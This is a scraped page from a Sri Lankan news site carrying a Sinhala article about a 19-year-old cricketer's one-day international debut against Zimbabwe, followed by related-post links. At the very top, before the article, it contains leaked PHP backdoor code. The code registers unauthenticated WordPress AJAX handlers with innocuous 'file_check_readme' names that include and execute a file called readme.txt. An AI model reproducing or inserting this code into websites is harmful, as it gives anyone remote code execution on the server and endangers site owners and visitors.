if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } මංගල එක්දින තරග වරම් ලැබූ වනිඳු ' ගාල්ල පිටියට බැස්ස මොහොතේම ' ඉතිහාසගත වෙයි - mediahumanrights.lk
mediahumanrights.lk
News Sports Sports News

මංගල එක්දින තරග වරම් ලැබූ වනිඳු ' ගාල්ල පිටියට බැස්ස මොහොතේම ' ඉතිහාසගත වෙයි

ශී‍්‍ර ලංකා කණ්ඩායම සහ සිම්බාබ්වේ කණ්ඩායම අතර මේවන විට පැවැත්වෙන දෙවන එක්දින කි‍්‍රකට් තරගය සඳහා වනිඳු හසරංග ක්‍රීඩා කරනු ලබනවා.
ඔහුගේ මංගල එක්දින ජාත්‍යන්තර තරගය මෙයයි.
ගාල්ල රිච්මන්ඩ් විදුහල නියෝජනය කළ 19 හැවිරිදි වනිඳු හසරංග තුන් ඉරියව් ක්‍රීඩකයකු වනවා.
ඔහු ශ්‍රී ලංකාව නියෝජනය කළ චතුරංග ද සිල්වාගේ බාල සොහොයුරා වන බැවින්  එකම පවුලේ සහෝදරයන්  ශ්‍රී ලංකා ජාතික ක්‍රිකට්‌ පිල නියෝජනය කරන අවස්ථාවක් බවට එය පත්වනවා.
තිලාන් සමරවීර සහ දුලිප් සමරවීර ද  ඊට පෙර රණතුංග සහ වෙත්තමුණි සහෝදරයන් ද ශ්‍රී ලංකාව නියෝජනය කර තිබෙනවා
(under the courtesy of nethfm news web)

Related posts

හිටපු ජනපති කාර්ය මණ්ඩල ප්‍රධානියා රිමාන්ඩ්

Shiran Viraj

මෙවර ලෝක කුසලානය ගේන්න බැරිවුනේ ලෙජන්ඩ් නාකියා නිසා..- ෂම්මි

Shiran Viraj

ශී‍්‍ර ලාංකිකයින් 522ක් විදේශයන්හි සිට කොරෝනා වැළදී මෙරටට පැමිණ ඇතැයි හෙළි වෙයි

Shiran Viraj